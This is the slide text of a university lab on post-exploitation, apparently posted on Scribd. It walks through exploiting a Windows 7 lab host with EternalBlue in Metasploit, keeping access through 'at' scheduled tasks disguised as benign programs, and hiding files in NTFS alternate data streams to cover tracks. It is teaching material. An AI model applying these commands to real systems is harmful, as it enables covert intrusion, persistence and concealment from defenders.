Scribd
Upload
31 views16 pages

CSCB524 - CCSB4113 - Chapter 8 Lab 8

The document discusses techniques for maintaining persistence after compromising a system, including creating scheduled tasks to execute programs periodically, creating custom daemon processes, establishing additional backdoors, creating new users, and implementing reverse and bind shells. It provides examples of using the Windows 'at' command to schedule a task to write system information to a hidden file stored within an alternate data stream of another file. This disguises the hidden file's existence and allows executing it through the parent file, demonstrating how an attacker could covertly maintain access to the system.

Uploaded by

Mohin Paramasivam
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
31 views16 pages

CSCB524 - CCSB4113 - Chapter 8 Lab 8

The document discusses techniques for maintaining persistence after compromising a system, including creating scheduled tasks to execute programs periodically, creating custom daemon processes, establishing additional backdoors, creating new users, and implementing reverse and bind shells. It provides examples of using the Windows 'at' command to schedule a task to write system information to a hidden file stored within an alternate data stream of another file. This disguises the hidden file's existence and allows executing it through the parent file, demonstrating how an attacker could covertly maintain access to the system.

Uploaded by

Mohin Paramasivam
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 16

Performing Post-Exploitation

Techniques

CHAPTER 8 LAB 8

CSCB524/CCSB4113 1
MAINTAINING PERSISTENCE
AFTER COMPROMISING A SYSTEM

CSCB524/CCSB4113 2
Ways to Maintain Persistence of a
Compromised System
I. Creating and manipulating scheduled
jobs and tasks
II. Creating custom daemons and processes
III. Creating additional back doors
IV. Creating new users
V. Creating reverse and bind shells

CSCB524/CCSB4113 3
Scheduled Tasks (at)
C:\at\\VICTIM 8:17pm /every:M,W,F User_Feed_Synchronization.exe

• Windows command-line program to


schedule tasks
– Looks like a benign program, update user
feed but maybe it is actually a reverse call
back to attacking platform to maintain that
persistence
• Task Scheduler is the GUI
version of the program

CSCB524/CCSB4113 4
Kali VS Windows 7
10.0.2.37 10.0.2.38

msf > use exploit/windows/smb/ms17_010_eternalblue


msf > msf exploit(ms17_010_eternalblue) > show options
msf exploit(ms17_010_eternalblue) > set RHOST 10.0.2.38
msf exploit(ms17_010_eternalblue) > run
CSCB524/CCSB4113
Windows 7 IP Address
5
Standard Shell Response, not meterpreter payload

C:\Windows\system32> time

Press ENTER

C:\Windows\system32> at 09:15 /every:Wednesday cmd /c “systeminfo > c:\info.txt”

C:\Windows\system32> at

CSCB524/CCSB4113 6
CSCB524/CCSB4113 7
CSCB524/CCSB4113 8
• This shows the
capability of
being able to
run any
program we
want:
– Pinging back
– Password
sniffers
– Key loggers
CSCB524/CCSB4113 9
COVERING TRACKS

CSCB524/CCSB4113 10
Erase, Modify or Disable the
Evidence
• Remove any unneeded files or tools that
were added to the victim’s machine
• Hiding other files and resources in hidden or
uncommon locations
– Linux, Unix, OS X
• Create a folder beginning with a dot (.)
– Windows
• Hide stuff in the System32 or User folders
• Apply hidden attribute
• Use alternate Data Streams
C:\type c:\info.txt > hello.txt:info.txt
C:\start notepad hello.txt:info.txt

CSCB524/CCSB4113 11
• Create a blank text file
C:\Windows\system32> cd \
C:\>type nul > hello.txt

• Check the file size


C:\>dir

• Hide info.txt inside the hello.txt


C:\>type c:\info.txt > hello.txt:info.txt

• Check the file size


C:\>dir

CSCB524/CCSB4113 12
• Delete info.txt
C:\>del info.txt

• In Windows 7, open hello.txt

• In Windows 7, open cmd


C:\Users\Test>cd \
C:\>start notepad hello.txt:info.txt

CSCB524/CCSB4113 13
Why is this useful to us?
• Instead of hiding text file, attacker could
be hiding malware and then they can call
that malware using the ‘at’ program
• No one can see the hidden file because of
alternate data stream

CSCB524/CCSB4113 14
Alternate Data Streams (ADS)
• Alternate Data Streams (ADS) are a file
attribute only found on the NTFS file
system
• The ability to fork file data into existing
files without affecting their functionality,
size, or display to traditional file
browsing utilities like dir or Windows
Explorer

CSCB524/CCSB4113 15
Department of Computing
College of Computing and Informatics
Universiti Tenaga Nasional

CSCB524/CCSB4113 16

You might also like